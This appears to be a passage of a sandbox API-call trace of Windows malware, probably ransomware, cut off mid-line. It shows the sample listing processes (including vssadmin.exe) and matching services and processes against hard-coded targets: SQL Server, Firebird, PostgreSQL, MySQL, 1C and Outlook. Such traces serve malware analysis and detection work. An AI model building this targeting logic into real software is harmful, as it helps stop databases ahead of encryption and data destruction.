lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0048.751] lstrlenW (lpString="vssadmin.exe") returned 12 [0048.751] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0048.752] lstrlenW (lpString="VSSVC.exe") returned 9 [0048.752] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.752] lstrlenW (lpString="svchost.exe") returned 11 [0048.752] Process32NextW (in: hSnapshot=0x204, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0048.753] CloseHandle (hObject=0x204) returned 1 [0048.753] Sleep (dwMilliseconds=0x1f4) [0049.481] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626d98 [0049.481] EnumServicesStatusExW (in: hSCManager=0x626d98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0049.481] GetLastError () returned 0xea [0049.481] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x628500 [0049.482] EnumServicesStatusExW (in: hSCManager=0x626d98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x628500, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x628500, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0049.482] CloseServiceHandle (hSCObject=0x626d98) returned 1 [0049.483] lstrlenW (lpString="Appinfo") returned 7 [0049.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0049.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0049.483] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0049.483] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0049.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0049.483] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0049.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.483] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0049.483] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0049.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0049.483] lstrlenW (lpString="AudioSrv") returned 8 [0049.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0049.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0049.483] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0049.483] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0049.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0049.483] lstrlenW (lpString="BFE") returned 3 [0049.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0049.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0049.483] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0049.483] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0049.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0049.483] lstrlenW (lpString="CryptSvc") returned 8 [0049.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0049.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0049.483] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0049.483] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0049.483] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0049.483] lstrlenW (lpString="CscService") returned 10 [0049.483] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0049.483] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0049.483] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0049.483] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0049.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0049.484] lstrlenW (lpString="DcomLaunch") returned 10 [0049.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.484] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0049.484] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0049.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0049.484] lstrlenW (lpString="Dhcp") returned 4 [0049.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0049.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0049.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0049.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0049.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0049.484] lstrlenW (lpString="Dnscache") returned 8 [0049.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0049.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0049.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0049.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0049.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0049.484] lstrlenW (lpString="DPS") returned 3 [0049.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0049.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0049.484] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0049.484] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0049.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0049.484] lstrlenW (lpString="eventlog") returned 8 [0049.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0049.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0049.484] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0049.484] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0049.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0049.484] lstrlenW (lpString="EventSystem") returned 11 [0049.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0049.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0049.484] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0049.484] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0049.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0049.485] lstrlenW (lpString="gpsvc") returned 5 [0049.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0049.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0049.485] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0049.485] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0049.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0049.485] lstrlenW (lpString="iphlpsvc") returned 8 [0049.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.485] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0049.485] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0049.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0049.485] lstrlenW (lpString="LanmanServer") returned 12 [0049.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0049.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0049.485] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0049.485] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0049.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0049.485] lstrlenW (lpString="LanmanWorkstation") returned 17 [0049.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.485] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0049.485] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0049.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0049.485] lstrlenW (lpString="lmhosts") returned 7 [0049.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0049.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0049.485] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0049.485] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0049.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0049.485] lstrlenW (lpString="MMCSS") returned 5 [0049.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0049.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0049.485] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0049.486] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0049.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0049.486] lstrlenW (lpString="MpsSvc") returned 6 [0049.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0049.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0049.486] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0049.486] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0049.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0049.486] lstrlenW (lpString="Netman") returned 6 [0049.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0049.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0049.486] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0049.486] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0049.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0049.486] lstrlenW (lpString="netprofm") returned 8 [0049.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0049.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0049.486] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0049.486] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0049.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0049.486] lstrlenW (lpString="NlaSvc") returned 6 [0049.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0049.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0049.486] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0049.486] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0049.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0049.486] lstrlenW (lpString="nsi") returned 3 [0049.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0049.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0049.486] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0049.486] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0049.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0049.486] lstrlenW (lpString="PcaSvc") returned 6 [0049.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0049.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0049.487] lstrlenW (lpString="PlugPlay") returned 8 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0049.487] lstrlenW (lpString="Power") returned 5 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0049.487] lstrlenW (lpString="ProfSvc") returned 7 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0049.487] lstrlenW (lpString="RpcEptMapper") returned 12 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0049.487] lstrlenW (lpString="RpcSs") returned 5 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0049.487] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0049.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0049.487] lstrlenW (lpString="SamSs") returned 5 [0049.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0049.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0049.487] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0049.488] lstrlenW (lpString="Schedule") returned 8 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0049.488] lstrlenW (lpString="SENS") returned 4 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0049.488] lstrlenW (lpString="ShellHWDetection") returned 16 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0049.488] lstrlenW (lpString="Spooler") returned 7 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0049.488] lstrlenW (lpString="swprv") returned 5 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0049.488] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0049.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0049.488] lstrlenW (lpString="SysMain") returned 7 [0049.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0049.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0049.488] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0049.489] lstrlenW (lpString="Themes") returned 6 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0049.489] lstrlenW (lpString="TrkWks") returned 6 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0049.489] lstrlenW (lpString="UxSms") returned 5 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0049.489] lstrlenW (lpString="VSS") returned 3 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0049.489] lstrlenW (lpString="WdiServiceHost") returned 14 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0049.489] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0049.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0049.489] lstrlenW (lpString="WdiSystemHost") returned 13 [0049.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0049.489] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0049.490] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0049.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0049.490] lstrlenW (lpString="Winmgmt") returned 7 [0049.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0049.490] lstrlenW (lpString="WPDBusEnum") returned 10 [0049.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0049.490] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0049.490] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0049.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0049.490] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x628500 | out: hHeap=0x5d0000) returned 1 [0049.490] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0049.492] Process32FirstW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0049.493] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0049.494] lstrlenW (lpString="System") returned 6 [0049.494] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0049.494] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0049.494] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0049.494] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0049.494] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0049.494] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0049.494] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0049.494] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0049.495] lstrlenW (lpString="smss.exe") returned 8 [0049.495] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0049.495] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0049.495] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0049.495] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0049.495] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0049.495] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0049.495] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0049.495] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.495] lstrlenW (lpString="csrss.exe") returned 9 [0049.495] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0049.495] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0049.495] lstrcmpiW (lpString1="outlook.exe", 